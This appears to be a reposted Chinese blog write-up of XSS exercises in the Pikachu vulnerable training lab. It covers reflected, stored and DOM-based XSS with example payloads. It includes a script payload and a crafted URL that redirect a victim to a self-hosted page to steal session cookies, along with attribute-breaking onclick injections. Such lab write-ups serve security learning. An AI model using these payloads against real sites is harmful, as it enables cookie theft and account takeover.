首页 > 其他 > 详细

pikachu--(2)关于各种XSS和CSRF

时间:2019-12-17 21:24:53      阅读:101      评论:0      收藏:0      [点我收藏+]

1.反射xss(get)

<script>alert(1)</script>(由于限制长度,需要修改前端的长度)

技术分享图片

 

 

 技术分享图片

 (其实get方法才是常见的,post很难做到诱导,因为涉及提交表单,用户是不会主动把你的恶意代码输入的.但我可以构造get请求:

http://127.0.0.1:801/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%20=%20%27http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html%27;%3C/script%3E&submit=submit)然后你点击了我就可以取到你的地址了嘻嘻

(那上面为什么不直接诱导访问恶意代码的网站?那肯定可以看出来不对啊........借xss反射型放在参数位置就可以掩盖了)

 

 2.反射xss(post)

登陆后和第一个的情况一样,不过这里可以窃取客户端cookie

技术分享图片

 

 

 欺骗cookie过程:(好像这个过程和那个输入框没什么关系,主要是诱导用户点击)

(1)诱导用户点击:(如输入框输入:<script>document.location = ‘http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html‘;</script>)

http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html(post.html为自己搭建的一个恶意站点)

(2)该站点向目标网站http://127.0.0.1:801/pikachu-master/vul/xss/xsspost/xss_reflected_post.php发送请求(相当于借用户进行请求拿取该用户的cookie,这不就csrf了吗....)然后获得用户登陆该网站的cookie

(3)恶意网站为防止用户发现不对劲,重定回正常的网站

技术分享图片

 

 技术分享图片

3.存储型xss

    存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台数据库存储起来,构成大范围的危害

技术分享图片

 

 

 技术分享图片

4.DOM型xss

‘ onclick="alert(‘xss‘)">

技术分享图片

 

 

 

成功弹窗

技术分享图片

 

 

 原理:

 它通过 getElementById 获取到了标签 Id 为 text的内容赋值给str

 然后又把 str 的内容通过字符串拼接的方式写到了 a 标签的 href 属性中,a标签会写到 Id 为 dom的 div 标签中

 我们通过闭合的方式构造Payload

5.DOM型xss-x

随便测测

技术分享图片

 

 

 点击后发现多出一行字

查看网页源代码

技术分享图片

 

 

继续尝试

‘ onclick="alert(‘xss‘)">

技术分享图片

 

 

 

  这里它定义了一个domxss函数

    它利用 window.location.search 获取浏览器中URL的内容,然后赋值给 str

    然后经过URL解码和字符串分隔,取出URL中的参数内容

    再把 “+” 替换为 “ ”(空格),赋值给 xss

    最后把 xss 拼接到 a 标签中,然后写到 Id 为 dom 的 div 标签中

    跟前面的DOM不同的是,它的输入是从浏览器的URL中获取的,很像反射型XSS(get)

6.xss盲打

pikachu--(2)关于各种XSS和CSRF

原文:https://www.cnblogs.com/P201721460006/p/12056497.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!